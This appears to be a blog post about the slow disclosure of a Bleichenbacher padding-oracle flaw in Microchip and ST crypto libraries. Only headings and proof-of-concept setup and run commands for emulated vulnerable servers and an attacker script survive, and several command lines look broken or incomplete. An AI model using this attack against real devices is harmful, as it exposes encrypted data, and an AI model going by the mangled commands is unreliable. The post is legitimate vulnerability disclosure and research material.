Silence Will Fall (Or How It Can Take 2 Years to Get Your Vuln Registered)

Photo credit: https://www.deviantart.com/heroeswho

Intro

PKCS#1v1.5

Basic RSA

RSA teething problems

Specification

Bleichenbacher’s Padding Oracle Attack

Back to disclosure

Proof of Concepts

General information

Preliminary steps

sudo apt install openssl python3 python3-pip python3-gmpy2 && python3 -m pip install -r requirements.txt
./initialize.sh

Microchip PoC

cd Microchip/vulnerable_server
cp -r ~/microchip/mla/v2018_11_26/framework/bigint .
cp -r ~/microchip/mla/v2018_11_26/framework/crypto_sw .
cp ../../Preparation/microchip_files/key_params.h .
./do_patch.sh
make
#AttackerTerminal
cp ../Preparation/attacker/attacker_params.py .
cp ../Preparation/speedup/trace.txt .
#VictimTerminal
./bleichenbacher_oracle_mla
#AttackerTerminal
python3 attacker.py
#AttackerTerminal
python3 -t trace.txt -s
#AttackerTerminal
python3 -t trace.txt

ST PoC

wget https://github.com/beckus/qemu_stm32/archive/stm32_v0.1.2.zip
unzip stm32_v0.1.2.zip
cd qemu_stm32-stm32_v0.1.2
sudo apt install arm-none-eabi-gcc-arm-non-eabi-newlib gcc
./configure --extra-cflags="-w" --enable-debug --target-list="arm-softmmu"
make
#include <sys/sysmacros.h>
cd qemu_stm32-stm32_v0.1.2
cp ../stm32_qemu.patch .
cp ../do_qemu_patch.sh .
wget https://github.com/beckus/stm32_p103_demos/archive/v0.3.0.zip
unzip v0.3.0.zip
unzip en.x-cube-cryptolib.zip
cp -r STM32CubeExpansion_Crypto_V3.1.0/Fw_Crypto/STM32F1/Middlewares/ST/STM32_Cryptographic stm32_p103_demos-0.3.0/
cd stm32_p103_demos-0.3.0
cp ../do_demos_patch.sh .
cp ../stm32_p103_demos.patch .
./do_demos_patch.sh
cp ../../../../Preparation/st_files/key_params.h demos/bleich/
make bleich_ALL
#Server QEMU terminal
./qemu-system-arm -M stm32-p103 -kernel ../../stm32_p103_demos-0.3.0/demos/bleich/main.bin -gdb tcp::3333
#Server GDB terminal
gdb-multiarch
file binary/stm32_p103_demos-0.3.0/demos/bleich/main.elf
target remote localhost:3333
source gdb_server/python-extender.py
pkill -9 gdb

Back to disclosure… Again

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store